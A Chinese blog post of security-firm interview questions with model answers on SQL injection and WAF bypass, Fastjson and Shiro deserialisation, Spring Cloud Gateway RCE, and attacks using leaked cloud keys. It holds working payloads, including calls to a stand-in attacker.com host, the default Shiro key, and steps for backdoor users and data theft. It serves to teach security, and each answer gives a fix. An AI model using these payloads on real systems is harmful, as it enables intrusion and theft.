绿盟面试题

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

1. SQL注入进阶利用

题目 :某登录系统存在SQL注入漏洞,但过滤了'"空格union关键字,如何绕过并获取管理员密码?
答案

  • 绕过引号:使用十六进制编码(0x61646D696E代替'admin')或宽字节注入(%bf%27);
  • 绕过空格:用/**/%0a代替;
  • 绕过union:使用盲注(布尔/时间盲注)或报错注入(extractvalue(1,concat(0x7e,(select user()))));
  • 利用示例:admin'^extractvalue(1,concat(0x7e,(select substr(password,1,20) from users where username=0x61646D696E)))%23
    修复方案:预编译(PreparedStatement)+ 白名单过滤。

2. AK/SK泄露的云环境渗透

题目 :在GitHub公开代码中发现某云厂商的AK/SK,如何快速验证并扩大攻击面?
答案

  1. 验证AK/SK有效性:使用AWS CLI执行aws sts get-caller-identity(或对应云厂商SDK);
  2. 权限枚举:列出IAM权限边界、S3存储桶、EC2实例等;
  3. 横向移动:创建后门用户、生成临时凭证、部署恶意Lambda函数;
  4. 数据泄露:下载敏感存储桶数据或数据库快照。
    修复方案:使用环境变量存储密钥、启用密钥轮换、限制IAM权限范围。

3. Fastjson反序列化漏洞

题目 :如何利用Fastjson ≤1.2.24的反序列化漏洞实现RCE?给出利用链及限制条件。
答案

  • 利用链JdbcRowSetImpl + JNDI注入(需出网);

  • Payload

    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true}

  • 限制条件 :目标需开启autoType功能(默认关闭);

  • 修复方案 :升级至1.2.83+,关闭autoType,使用安全模式。

4. Java代码审计:危险方法调用

题目:审计以下代码,指出漏洞并说明利用方式:

复制代码
String cmd = request.getParameter("cmd");
Runtime.getRuntime().exec(cmd);

答案

  • 漏洞 :未过滤直接执行用户输入的cmd参数,导致命令注入;
  • 绕过技巧 :使用;&|$(subshell)分割命令;
  • 修复方案 :使用白名单校验或ProcessBuilder参数化调用。

5. Shiro反序列化漏洞

题目 :如何利用Shiro的RememberMe功能实现反序列化攻击?给出关键步骤。
答案

  1. 获取Cookie中的rememberMe字段(Base64+AES-CBC加密);
  2. 利用已知Key(默认Key如kPH+bIxk5D2deZiIxcaaaA==)或爆破Key;
  3. 构造恶意序列化数据(如CommonsCollections链),加密后替换Cookie;
  4. 触发反序列化实现RCE。
    修复方案:更换Shiro Key,升级至1.7.0+,禁用危险链。

6. 框架漏洞:Spring Cloud Gateway RCE

题目 :简述CVE-2022-22947的利用条件及攻击步骤。
答案

  • 漏洞成因 :未校验路由配置的Filter参数,导致SpEL表达式注入;
  • 利用步骤
    1. 添加恶意路由:POST /actuator/gateway/routes/test,Body包含SpEL表达式(如T(java.lang.Runtime).getRuntime().exec("curl attacker.com"));
    2. 刷新路由:POST /actuator/gateway/refresh
    3. 访问路由触发RCE。
      修复方案:升级Spring Cloud Gateway至3.1.1+,禁用Actuator接口。

7. SQL注入绕过WAF

题目 :某WAF拦截了UNION SELECTinformation_schema,如何获取数据库名?
答案

  • 替代information_schema:使用sys.schema_auto_increment_columns(MySQL 5.6+);

  • 绕过UNION:利用报错注入或布尔盲注;

  • Payload示例:

    ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --+

修复方案:使用ORM框架+参数化查询,禁用错误回显。

相关推荐
Scott9999HH5 分钟前
高端胶原蛋白饮多品牌深度对比:抗皱机理、国际研发标准、气色维度,一套可直接用的选品框架
安全
2501_9151063212 分钟前
深入解析无源码iOS加固原理与方案,保护应用安全
android·安全·ios·小程序·uni-app·cocoa·iphone
一拳一个娘娘腔39 分钟前
【SRC漏洞挖掘系列】第04期:文件上传与解析——把图片变成“特洛伊木马”
安全·web安全
探索者0140 分钟前
SQL注入深度解析笔记:从DNSlog外带到高级绕过技术
web安全·sql注入
宋浮檀s43 分钟前
SQL注入基础+DVWA搭建
数据库·sql·安全·网络安全
宋浮檀s1 小时前
DVWA通关教程1
网络·安全·web安全
IT大白鼠1 小时前
Dirty Frag漏洞深度分析:Linux内核页缓存污染漏洞的技术原理与安全防护
linux·安全·dirty frag漏洞
祁白_1 小时前
[0xV01D]_Glass Parcel_writeUp
大数据·安全·ctf·writeup
上海知从科技1 小时前
SENT传输协议:汽车传感器数字化通信的最优解决方案
科技·安全·汽车·软件工程·汽车电子
@insist1231 小时前
信息安全工程师-网站安全主动防御体系构建与政务网站合规实践
网络·安全·软考·信息安全工程师·政务·软件水平考试